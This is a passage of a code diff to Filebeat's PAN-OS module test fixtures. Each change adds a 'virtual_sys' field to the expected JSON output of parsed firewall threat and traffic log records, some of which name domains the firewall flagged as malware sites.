"uLLGRaXP.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "173.236.179.57", "192.168.0.2", @@ -5281,6 +5335,7 @@ "panw.panos.threat.resource": "basdzsdas.com/poker/config.bin", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "basdzsdas.com" ], 
@@ -5371,6 +5426,7 @@ "panw.panos.threat.resource": "FunkyEmoticons_setup.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "91.209.163.202", "192.168.0.2", @@ -5464,6 +5520,7 @@ "panw.panos.threat.resource": "52hxw.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "122.226.169.183", "192.168.0.2", @@ -5564,6 +5621,7 @@ "panw.panos.threat.resource": "softsellfast.com/test/config.bin", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "softsellfast.com" ], @@ -5654,6 +5712,7 @@ "panw.panos.threat.resource": "setup.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "109.201.131.15", "192.168.0.2", @@ -5744,6 +5803,7 @@ "panw.panos.threat.resource": "Live-Player_setup.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "91.209.163.202", "192.168.0.2", @@ -5842,6 +5902,7 @@ "panw.panos.threat.resource": "boialex.narod.ru/config.txt", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "boialex.narod.ru" ], @@ -5937,6 +5998,7 @@ "panw.panos.threat.resource": "edw-melon.narod.ru/config.txt", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "edw-melon.narod.ru" ], @@ -6032,6 +6094,7 @@ "panw.panos.threat.resource": "maximtushin.narod.ru/config.txt", "panw.panos.type": "THREAT", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "maximtushin.narod.ru" ], 
@@ -6122,6 +6185,7 @@ "panw.panos.threat.resource": "uLLGRaXP.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "173.236.179.57", "192.168.0.2", @@ -6223,6 +6287,7 @@ "panw.panos.threat.resource": "marketingsoluchion.biz/fkn/config.bin", "panw.panos.type": "THREAT", "panw.panos.url.category": "unknown", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "marketingsoluchion.biz" ], @@ -6323,6 +6388,7 @@ "panw.panos.threat.resource": "default.aspx", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.6", "207.46.140.46", @@ -6406,6 +6472,7 @@ "panw.panos.threat.resource": "sck.aspx", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "65.54.161.34", "192.168.0.6", @@ -6499,6 +6566,7 @@ "panw.panos.threat.resource": "ADSAdClient31.dll", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "65.55.5.231", "192.168.0.6", @@ -6602,6 +6670,7 @@ "panw.panos.threat.resource": "c.gif", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.6", "65.54.71.11", @@ -6684,6 +6753,7 @@ "panw.panos.threat.resource": "csi", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.239.17", "192.168.0.6", @@ -6781,6 +6851,7 @@ "panw.panos.threat.resource": "internal-tuner.pandora.com", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "208.85.40.48", @@ -6863,6 +6934,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.198", "192.168.0.2", 
@@ -6953,6 +7025,7 @@ "panw.panos.threat.resource": "about.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "188.190.124.75", "192.168.0.6", @@ -7045,6 +7118,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.200", "192.168.0.2", @@ -7134,6 +7208,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.239.3", "192.168.0.2", @@ -7223,6 +7298,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.239.3", "192.168.0.2", @@ -7312,6 +7388,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.200", "192.168.0.2", @@ -7409,6 +7486,7 @@ "panw.panos.threat.resource": "__utm.gif", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "74.125.239.6", @@ -7491,6 +7569,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.193", "192.168.0.2", @@ -7581,6 +7660,7 @@ "panw.panos.threat.resource": "nav_logo107.png", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.239.20", "192.168.0.2", @@ -7670,6 +7750,7 @@ "panw.panos.threat.resource": "Eadweard_Muybridge", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "208.80.154.225", "192.168.0.2", 
@@ -7760,6 +7841,7 @@ "panw.panos.threat.resource": "load.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "208.80.154.234", "192.168.0.2", @@ -7850,6 +7932,7 @@ "panw.panos.threat.resource": "8fe44cb728c0f40750c64ee906eb72.css", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "65.54.75.25", "192.168.0.6", @@ -7942,6 +8025,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.206", "192.168.0.2", @@ -8031,6 +8115,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.195", "192.168.0.2", @@ -8121,6 +8206,7 @@ "panw.panos.threat.resource": "appcast.xml", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "207.178.96.34", "192.168.0.2", @@ -8213,6 +8299,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.195", "192.168.0.2", @@ -8302,6 +8389,7 @@ "panw.panos.threat.resource": "csi", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.239.20", "192.168.0.2", @@ -8392,6 +8480,7 @@ "panw.panos.threat.resource": "index.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "66.152.109.24", "192.168.0.2", @@ -8484,6 +8573,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.200", "192.168.0.2", 
@@ -8581,6 +8671,7 @@ "panw.panos.threat.resource": "__utm.gif", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "74.125.224.201", @@ -8663,6 +8754,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.200", "192.168.0.2", @@ -8752,6 +8844,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.200", "192.168.0.2", @@ -8849,6 +8942,7 @@ "panw.panos.threat.resource": "internal-tuner.pandora.com", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "208.85.40.48", @@ -8931,6 +9025,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.201", "192.168.0.2", @@ -9020,6 +9115,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.201", "192.168.0.2", @@ -9109,6 +9205,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.200", "192.168.0.2", @@ -9198,6 +9295,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.200", "192.168.0.2", @@ -9288,6 +9386,7 @@ "panw.panos.threat.resource": "ga.js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.198", "192.168.0.2", 
@@ -9377,6 +9476,7 @@ "panw.panos.threat.resource": "js", "panw.panos.type": "THREAT", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "74.125.224.200", "192.168.0.2", diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json index a4ae1b157d9..c90c76236b3 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json @@ -74,6 +74,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -171,6 +172,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -268,6 +270,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -368,6 +371,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -468,6 +472,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -565,6 +570,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -662,6 +668,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", 
@@ -762,6 +769,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -862,6 +870,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -962,6 +971,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1062,6 +1072,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1162,6 +1173,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1262,6 +1274,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1362,6 +1375,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1462,6 +1476,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1562,6 +1577,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", 
@@ -1662,6 +1678,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1762,6 +1779,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1862,6 +1880,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -1959,6 +1978,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -2056,6 +2076,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -2156,6 +2177,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2253,6 +2275,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -2353,6 +2376,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2453,6 +2477,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "private-ip-addresses", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", 
@@ -2553,6 +2578,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -2650,6 +2676,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -2747,6 +2774,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -2847,6 +2875,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "98.149.55.63", @@ -2947,6 +2976,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -3044,6 +3074,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -3144,6 +3175,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "search-engines", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "212.48.10.58", @@ -3244,6 +3276,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -3341,6 +3374,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", 
@@ -3438,6 +3472,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -3538,6 +3573,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -3638,6 +3674,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -3735,6 +3772,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -3832,6 +3870,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -3927,6 +3966,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.100", "8.8.8.8", @@ -4020,6 +4060,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "entertainment-and-arts", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "62.211.68.12", @@ -4118,6 +4159,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "computer-and-internet-security", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.100", "50.19.102.116", @@ -4214,6 +4256,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "65.55.223.19", 
@@ -4314,6 +4357,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "65.55.223.24", @@ -4409,6 +4453,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.100", "8.8.8.8", @@ -4505,6 +4550,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -4602,6 +4648,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -4702,6 +4749,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -4799,6 +4847,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -4896,6 +4945,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -4993,6 +5043,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -5090,6 +5141,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", 
@@ -5187,6 +5239,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "62.211.68.12", @@ -5287,6 +5340,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "search-engines", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "212.48.10.58", @@ -5387,6 +5441,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "malware-sites", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -5484,6 +5539,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -5584,6 +5640,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -5681,6 +5738,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -5778,6 +5836,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -5878,6 +5937,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "65.55.223.31", @@ -5978,6 +6038,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", 
@@ -6075,6 +6136,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -6172,6 +6234,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -6269,6 +6332,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "entertainment-and-arts", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "62.211.68.12", @@ -6366,6 +6430,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -6463,6 +6528,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -6560,6 +6626,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -6660,6 +6727,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -6757,6 +6825,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "business-and-economy", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "62.211.68.12", @@ -6857,6 +6926,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", 
@@ -6954,6 +7024,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -7051,6 +7122,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -7151,6 +7223,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -7248,6 +7321,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "8.5.1.1", @@ -7345,6 +7419,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -7442,6 +7517,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "205.171.2.25", @@ -7542,6 +7618,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", @@ -7632,6 +7709,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "192.168.0.1", @@ -7732,6 +7810,7 @@ "panw.panos.sub_type": "end", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "search-engines", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "212.48.10.58", 
